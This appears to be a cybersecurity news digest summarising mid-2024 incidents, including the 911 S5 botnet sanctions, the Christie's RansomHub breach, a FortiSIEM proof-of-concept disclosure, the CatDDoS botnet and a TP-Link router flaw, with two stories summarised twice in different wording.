Daily Brief

The U.S. Treasury Department imposed sanctions on a cybercrime network that included three Chinese nationals and three companies based in Thailand. The network operated the 911 S5 botnet, controlling around 120,000 residential proxy nodes globally via malware distributed through a free VPN service. The Office of Foreign Assets Control (OFAC) described the 911 S5 service as a means for cybercriminals to mask their activities using the infected IP addresses of unsuspecting victims. This botnet allowed criminals to commit extensive fraud, including filing tens of thousands of deceptive applications for COVID-19 relief funds, resulting in billions of dollars in losses. The botnet's compromised IP addresses were also used in a series of bomb threats across the U.S. in July 2022. Individuals sanctioned include Yunhe Wang, the botnet administrator; Jingping Liu, responsible for laundering proceeds; and Yanni Zheng, a legal representative. Sanctions restrict all transactions involving the designated parties in the U.S. and warn that any dealings with these entities may be subject to further sanctions or enforcement action. The announcement coincided with reports of Chinese state hackers increasingly using compromised proxy servers and virtual private servers to conduct espionage, avoiding detection.

The U.S. Treasury Department imposed sanctions on three Chinese nationals and three Thailand-based entities linked to the 911 S5 botnet. This botnet, which compromised approximately 19 million IP addresses worldwide, was used to conduct cybercrimes, including significant fraud related to U.S. relief programs. Victims were tricked into downloading malware by a spoofed VPN service which then added their devices to the botnet, using their IP addresses for criminal activities. Attacks attributed to 911 S5 users included widespread fraud and bomb threats across the United States. The Office of Foreign Assets Control (OFAC) has identified and sanctioned individuals and companies involved, freezing their assets and prohibiting transactions with U.S. entities. The sanctions aim to disrupt the operations of the botnet, which allowed cybercriminals to anonymize their illegal online activities by routing them through victims’ computers. Cybersecurity firm Mandiant has reported that similar tactics are being adopted by Chinese state hackers, further complicating the cyber threat landscape.

BreachForums, a notorious ransomware leak site, is operational again weeks after an FBI-led shutdown. The site is reportedly now managed by ShinyHunters, a group previously involved in its administration. Following its May 15 takedown, the FBI had control of their domains and displayed warnings on the website and its Telegram channel. Despite the apprehension of other admins, ShinyHunters claims no arrests among its members and successfully regained control of the site's domains. There has been no formal comment from the FBI or the US Department of Justice about the takedown or the site's reappearance. BreachForums has continually posed challenges to law enforcement, persistently reemerging even after high-profile shutdowns. Expert commentary suggests that completely dismantling such organized online criminal operations involves capturing all associated personnel and securing all technological and financial networks.

Evgeniy Doroshenko, a 31-year-old Russian national, has been indicted in the U.S. for wire and computer fraud from February 2019 to May 2024. Doroshenko operated as an "initial access broker," infiltrating corporate networks and then selling access to these networks on Russian cybercrime forums. He used the online aliases "FlankerWWH" and "Flanker" to carry out his operations, often utilizing brute-force attacks on Remote Desktop Protocol services. One highlighted case involved offering access to a New Jersey company's network with bids starting at $3,000 and a "buy now" price of $6,000. The indictment includes an instance where Doroshenko extracted data valued over $5,000 from one of the compromised systems. Wire fraud charges against Doroshenko carry a potential penalty of 20 years in prison and a $250,000 fine, while computer fraud could lead to five years in prison and similar fines. Doroshenko remains at large, likely in Russia, raising doubts about the feasibility of his extradition and arrest.

Microsoft has identified the North Korean hacking group, Moonstone Sleet, as the orchestrator behind the FakePenny ransomware, demanding millions in ransom. Moonstone Sleet, initially similar to another group, Diamond Sleet, has developed its unique methods and tools, distancing itself from earlier shared techniques. The group uses various deceptive approaches like trojanized software, fake companies, and social media to infiltrate target networks, previously focusing only on espionage and now including financial extortion. The latest ransomware attacks show a significant increase in ransom demands, up to $6.6 million, indicating a shift towards large-scale financial gains. The tactics employed by Moonstone Sleet represent a broader trend of evolving capabilities among North Korean cyber groups, aiming to meet state-sponsored cyber objectives and potentially disrupt international targets. Historical context underscores the continuity and escalation of North Korean state-sponsored cyberattacks, with previous global incidents like WannaCry and Maui ransomware attacks linked to groups like Lazarus and Holy Ghost.

SpiderOak One experienced significant service disruptions following a datacenter upgrade on April 24, affecting its encrypted backup solution primarily used for ransomware protection. Many users, some with subscriptions spanning a decade, reported inability to back up data and expressed intentions to cancel their subscriptions despite ongoing payments. SpiderOak has been actively issuing refunds and reimbursing customers for unused subscription months while their services are not fully operational. Customer frustrations grew due to poor communication about the duration of service disruptions and delayed email responses from support. Despite the company's claim of nearing full operational status at 99% functionality, user reports suggest ongoing issues with reliability and account billing inconsistencies. The company’s support was temporarily shifted to its X social media account after the support system was compromised by the datacenter migration. SpiderOak attributes the migration to a necessary step for improving data redundancy, scalability, and disaster recovery, and states it is close to restoring full service. The remaining issue involves a specific cluster requiring more attention due to its unique architecture; SpiderOak denies hardware failure as a cause.

Security researchers at Horizon3 revealed a proof-of-concept (PoC) exploit for a critical command injection vulnerability in Fortinet’s SIEM solution. The vulnerability, identified as CVE-2024-23108, allows remote command execution as root without authentication and affects FortiSIEM versions from 6.4.0 upwards. Fortinet initially misidentified the bug as a duplicate of a previously addressed issue, CVE-2023-34992, but later confirmed it as a distinct vulnerability. This vulnerability, alongside another severe flaw CVE-2024-23109, was patched by Fortinet on February 8, although initially denied as real issues. The PoC exploit enables attackers to execute unauthorized commands on unpatched FortiSIEM appliances, potentially gaining full control. Horizon3 Attack Team also disclosed a PoC for a critical flaw in Fortinet's FortiClient EMS, which is currently being exploited in the wild. Fortinet systems have been targeted in recent cyberattacks, including the use of their vulnerabilities for deploying malware in corporate and government networks.

Christie's confirmed a data breach after the RansomHub extortion gang claimed to have stolen sensitive client data. The breach occurred earlier this month, with the ransomware group threatening to leak the data if not compensated. RansomHub listed Christie's on its dark web extortion page, demanding ransom and threatening GDPR fines. The attack compromised personal details of approximately 500,000 clients but did not affect financial or transaction records. Christie’s took immediate action by securing their systems and took their website offline to mitigate further risks. The company is actively notifying affected clients and relevant regulators and government agencies about the breach. Despite being labeled a ransomware group, RansomHub primarily executes data theft and extortion without using an encryptor. Christie's historical significance and high-profile auction sales highlight the potential impact and visibility of the breach.

Christie's auction house confirmed a data theft following an online ransomware attack by the RansomHub group. The attackers claimed to have stolen personal data of over 500,000 Christie's clients and provided a seven-day deadline for ransom payment. Christie's had previously experienced a disruption described as a “technology security issue” which took their online bidding system offline. The auction house took immediate action by taking their website offline and conducting an investigation which confirmed unauthorized access to their network. No financial or transactional records were reported compromised but limited client personal data was accessed. Christie's has contacted privacy regulators and government agencies and is in the process of notifying affected clients. The company has refused to meet the ransom demands, aligning with strategies to not comply with extortion to discourage future attacks despite potential data exposure risks.

Chirag Tomar pleaded guilty to a wire fraud conspiracy involving over $37 million in cryptocurrency theft from unsuspecting victims globally and in the United States. The fraudulent operation consisted of a fake website, "CoinbasePro[.]com," deliberately designed to mimic the genuine cryptocurrency exchange platform, Coinbase Pro. Tomar and accomplices impersonated Coinbase customer service to obtain two-factor authentication codes from victims, enabling unauthorized access and theft of cryptocurrency from their legitimate Coinbase accounts. The stolen cryptocurrencies were transferred to wallets controlled by the fraudsters, converted into other digital currencies or moved to different wallets, and cashed out to fund a luxurious lifestyle, including high-end cars and international trips. Tomar's arrest took place as he entered the U.S. on December 20, 2023; he faces up to 20 years in prison and a $250,000 fine if convicted. The expose follows other arrests including a scheme aiding North Korean IT workers to fraudulently secure jobs at U.S. companies, indirectly supporting North Korea's weapons of mass destruction program despite international sanctions. This sequence of events underlines an ongoing global challenge with cryptocurrency theft and fraudulent schemes, showcasing significant international and multilateral cybersecurity threats.

Identifying and securing business-critical assets is crucial for cybersecurity and organizational success. A strategic approach includes mapping business processes to their underlying technology assets. Gartner’s continuous threat exposure management framework assists in focusing remediation efforts on maximizing impact. Prioritizing issues related to business-critical assets aligns security initiatives with executive concerns and business objectives. Implementing security measures should start from the most significant areas and use detailed risk assessments and stakeholder input for prioritization. Tools such as vulnerability management solutions or penetration test results are essential to identify and prioritize remediation actions. Focusing on business-critical assets not only secures them but also optimizes the company’s use of resources, enhancing overall business performance. Aligning security measures with business goals demonstrably supports business process continuity and meets executive expectations.

The CatDDoS malware botnet has been utilizing over 80 known security vulnerabilities to compromise devices and integrate them into a DDoS botnet. CatDDoS, a variant of the Mirai botnet, employs UDP, TCP, and other DDoS methods, mainly targeting devices in China and the U.S. Compromised devices include a wide range of routers and networking equipment from major brands like Cisco, Huawei, and NETGEAR. Attackers encrypt communications with C2 servers using the ChaCha20 algorithm and employ OpenNIC domains for evasion. Despite the suspected shutdown of the original CatDDoS operation in December 2023, its source code was sold, leading to new botnet variants. Newly disclosed DNSBomb attack exploits DNS features for a pulsing denial-of-service with an amplification factor of 20,000x, but major DNS software BIND is not vulnerable. The DNSBomb method leverages IP spoofing and controlled domain responses to create overwhelming traffic bursts difficult to detect and mitigate.

ARPA-H, inspired by DARPA, focuses on neglected yet crucial areas in health science and technology to produce impactful, sustainable innovations. The UPGRADE project, recently launched by ARPA-H, aims to develop automated systems for detecting vulnerabilities and managing patches in healthcare IT. UPGRADE uses a "digital twin" model to safely experiment and refine cybersecurity measures on a mirrored system without risking the primary system. The initiative seeks to establish a form of "digital immunology," drawing parallels between biological immune responses and cybersecurity defenses. Despite the potential benefits, the project faces significant challenges, including the complexity of creating accurate digital twins of intricate systems and the inconsistency in patch management and testing. The project emphasizes collaboration with open source communities to foster a more universally secure IT environment, potentially revolutionizing cybersecurity practices across industries. UPGRADE's success could lead to widespread adoption and improve systemic security, but it also confronts an industry reluctant to embrace necessary changes for enhanced security.

Unknown attackers are exploiting the Dessky Snippets WordPress plugin to inject malicious PHP code into e-commerce sites, enabling stealing of credit card data. The malicious activity was flagged by Sucuri on May 11, 2024, noting that the plugin is installed in over 200 active sites. The attackers are using manipulated checkout processes in WooCommerce to insert additional fields in billing forms, asking for sensitive credit card information. The acquired data, including names, card numbers, expiry dates, and CVV numbers, get exfiltrated to a designated malicious server. The modified billing forms by the attackers disable autocomplete features to evade browser security warnings and decrease consumer suspicion. Previous exploits in similar veins have involved other WordPress plugins, such as WPCode and Simple Custom CSS and JS, targeting over 39,000 sites in recent campaigns. Website owners are advised to update their sites and plugins regularly, use robust passwords, and routinely check for signs of unauthorized alterations and malware.

A critical vulnerability in the TP-Link Archer C5400X gaming router allows for remote code execution. The flaw, identified as CVE-2024-5035, received the highest severity rating with a CVSS score of 10.0. All firmware versions up to 1_1.1.6 are affected; patch available in version 1_1.1.7. Attackers could exploit the router's RF testing binary by bypassing command restrictions using shell meta-characters. The vulnerability was disclosed by German cybersecurity firm ONEKEY, highlighting risks of rushed-API implementations. TP-Link addressed the issue in the latest firmware update by blocking commands containing special characters. Recent disclosures of unpatched vulnerabilities in other devices stress the need for secure network interface configurations.